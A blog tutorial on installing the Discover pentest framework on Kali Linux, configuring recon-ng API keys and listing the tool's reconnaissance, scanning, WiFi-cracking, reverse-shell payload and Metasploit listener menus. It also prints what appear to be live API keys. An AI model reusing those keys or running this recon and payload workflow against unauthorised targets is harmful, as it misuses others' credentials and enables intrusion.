Installing Discover on Kali Linux

SOURCE: http://www.thegeeky.space/2015/04/how-to-save-time-doing-passive-discovery-in-Kali-Linux-using-discover-or-backtrack-script-framework.html

Configuring recon-ng
-register bing_api*
go to https://azure.microsoft.com/en-us/services/cognitive-services/search/ and sign in using your Hotmail or Skype account or create new account
-register builtwith_api* https://api.builtwith.com
d7cfa1da-8bc2-46df-816e-e1fbd888475c
-register facebook_api https://developers.facebook.com
-register fullcontact_api* https://portal.fullcontact.com/signup
574dcf32717c83a9
-register  github_api*
AIzaSyBDUbBRqbI3Oq3zVY34TiYBzzLGjPFsVQ0
0CImE8MxyVI6ZAoldvGdfNcaLdsXQ8
-register ipinfodb_api http://www.ipinfodb.com/register.php
-register linkedin_api https://developer.linkedin.com
-register shodan_api* https://www.shodan.io//
7Bl9THLHdEEFFyYJy0QOc69CtIEGKGpD
-register with twitter_api https://dev.twitter.com
NOTE:
-api with * is needed

# recon-ng
  keys add bing_api <value>
  keys add builtwith_api <value>
  keys add fullcontact_api <value>
  keys add github_api <value>
  keys add google_api <value>
  keys add google_cse <value>
  keys add hashes_api <value>
  keys add shodan_api <value>

> keys list
  +———————————————————+
  |       Name       |                Value                 |
  +———————————————————+
  | bing_api         |                                      |
  | builtwith_api    | d7cfa1da-8bc2-46df-816e-e1fbd8884… |
  | censysio_id      |                                      |
  | censysio_secret  |                                      |
  | flickr_api       |                                      |
  | fullcontact_api  | 574dcf32717c8…                     |
  | github_api       |                                      |
  | google_api       |                                      |
  | google_cse       | AIzaSyBDUbBRqbI3Oq3zVY34TiYBzzLGjPFs… |
  | hashes_api       | 0CImE8MxyVI6ZAoldvGdfNcaLds…       |
  | instagram_api    |                                      |
  | instagram_secret |                                      |
  | ipinfodb_api     |                                      |
  | jigsaw_api       |                                      |
  | jigsaw_password  |                                      |
  | jigsaw_username  |                                      |
  | linkedin_api     |                                      |
  | linkedin_secret  |                                      |
  | pwnedlist_api    |                                      |
  | pwnedlist_iv     |                                      |
  | pwnedlist_secret |                                      |
  | shodan_api       | 7Bl9THLHdEEFFyYJy0QOc69CtIEGK…     |
  | twitter_api      |                                      |
  | twitter_secret   |                                      |
  +———————————————————+

Installing Discover
# cd /root
# cd  discover
# ./update.sh
# chmod +x /usr/share/theharvester/theHarvester.py

# ./discover.sh
______  ___ ______ ______  _____  _    _ ______  _____
|     \  |  |____  |      |     |  \  /  |_____ |____/
|_____/ _|_ _____| |_____ |_____|   \/   |_____ |    \_
By Lee Baird
RECON
1.  Domain
2.  Person
3.  Parse salesforce

SCANNING
4.  Generate target list
5.  CIDR
6.  List
7.  IP, range, or URL
8.  Rerun Nmap scripts and MSF aux.

WEB
9.  Insecure direct object reference
10. Open multiple tabs in Firefox
11. Nikto
12. SSL

MISC
13. Crack WiFi
14. Parse XML
15. Generate a malicious payload
16. Start a Metasploit listener
17. Update
18. Exit
Choice:

Domain
RECON
1. Passive
2. Active
3. Previous menu
– Passive uses ARIN, dnsrecon, goofile, goog-mail, goohost, theHarvester, Metasploit, URLCrazy, Whois, multiple websites, and recon-ng.
– Active uses Nmap, dnsrecon, Fierce, lbd, WAF00W, traceroute, and Whatweb.
– Acquire API keys for Bing, Builtwith, Fullcontact, GitHub, Google, Hashes, and Shodan for maximum results with recon-ng.

Person
RECON
First name:
Last name:
– Combines info from multiple websites.

Parse salesforce
Create a free account at salesforce (https://connect.data.com/login).
Perform a search on your target company > select the company name > see all.
Copy the results into a new file.
Enter the location of your list:
– Gather names and positions into a clean list.

SCANNING
Generate target list
SCANNING
1. Local area network
2. NetBIOS
3. netdiscover
4. Ping sweep
5. Previous menu
– Use different tools to create a target list including Angry IP Scanner, arp-scan, netdiscover and nmap pingsweep.

CIDR, List, IP, Range, or URL
Type of scan:
1. External
2. Internal
3. Previous menu
– External scan will set the nmap source port to 53 and the max-rrt-timeout to 1500ms.
– Internal scan will set the nmap source port to 88 and the max-rrt-timeout to 500ms.
– Nmap is used to perform host discovery, port scanning, service enumeration and OS identification.
– Matching nmap scripts are used for additional enumeration.
– Addition tools: enum4linux, smbclient, and ike-scan.
– Matching Metasploit auxiliary modules are also leveraged.

WEB
Insecure direct object reference
Using Burp, authenticate to a site, map & Spider, then log out.
Target > Site map > select the URL > right click > Copy URLs in this host.
Paste the results into a new file.
Enter the location of your file:

Open multiple tabs in Firefox
Open multiple tabs in Firefox with:
1. List
2. Directories from a domain’s robot.txt.
3. Previous menu
– Use a list containing IPs and/or URLs.
– Use wget to pull a domain’s robot.txt file, then open all of the directories.

Nikto
Run multiple instances of Nikto in parallel.
1. List of IPs.
2. List of IP:port.
3. Previous menu

SSL
Check for SSL certificate issues.
Enter the location of your list:
– Use sslscan and sslyze to check for SSL/TLS certificate issues.

MISC
Crack WiFi
– Crack wireless networks.

Parse XML
Parse XML to CSV.
1. Burp (Base64)
2. Nessus
3. Nexpose
4. Nmap
5. Qualys
6. Previous menu

Generate a malicious payload
MALICIOUS PAYLOADS
1. android/meterpreter/reverse_tcp
2. cmd/windows/reverse_powershell
3. linux/x64/shell_reverse_tcp
4. linux/x86/meterpreter/reverse_tcp
5. osx/x64/shell_reverse_tcp
6. php/meterpreter/reverse_tcp
7. windows/meterpreter/reverse_tcp
8. windows/x64/meterpreter/reverse_tcp
9. Previous menu

Start a Metasploit listener
Metasploit LISTENERS
1. android/meterpreter/reverse_tcp
2. cmd/windows/reverse_powershell
3. linux/x64/shell_reverse_tcp
4. linux/x86/meterpreter/reverse_tcp
5. osx/x64/shell_reverse_tcp
6. php/meterpreter/reverse_tcp
7. windows/meterpreter/reverse_tcp
8. windows/x64/meterpreter/reverse_tcp
9. Previous menu
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s